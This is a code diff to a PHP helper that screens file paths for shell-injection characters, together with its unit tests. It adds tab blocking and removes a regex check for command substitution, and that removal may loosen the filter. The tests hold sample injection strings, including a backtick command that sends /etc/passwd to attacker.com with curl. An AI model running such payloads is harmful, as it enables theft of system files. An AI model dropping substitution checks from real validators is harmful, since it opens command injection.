diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index 7a74c702f..0f5b6f553 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -128,6 +128,7 @@ function validateShellSafePath(string $input, string $context = 'path'): string
         ';' => 'command separator',
         "\n" => 'newline (command separator)',
         "\r" => 'carriage return',
+        "\t" => 'tab (token separator)',
         '>' => 'output redirection',
         '<' => 'input redirection',
     ];
@@ -142,15 +143,6 @@ function validateShellSafePath(string $input, string $context = 'path'): string
         }
     }
 
-    // Additional pattern-based checks for complex attack vectors
-    // Check for command substitution patterns: $(command) or `command`
-    if (preg_match('/\$\(|\$\{|`/', $input)) {
-        throw new \Exception(
-            "Invalid {$context}: command substitution patterns detected. ".
-            'This is not allowed for security reasons.'
-        );
-    }
-
     return $input;
 }
 
diff --git a/tests/Unit/ValidateShellSafePathTest.php b/tests/Unit/ValidateShellSafePathTest.php
index bc6d2a60d..8181670e2 100644
--- a/tests/Unit/ValidateShellSafePathTest.php
+++ b/tests/Unit/ValidateShellSafePathTest.php
@@ -78,6 +78,13 @@
         ->toThrow(Exception::class, 'newline');
 });
 
+test('blocks tab character as token separator', function () {
+    $path = "/tmp/file\tcurl attacker.com";
+
+    expect(fn () => validateShellSafePath($path, 'test'))
+        ->toThrow(Exception::class, 'tab');
+});
+
 test('blocks complex command injection with the example from issue', function () {
     $path = '/tmp/pwn`curl https://attacker.com -X POST --data "$(cat /etc/passwd)"`';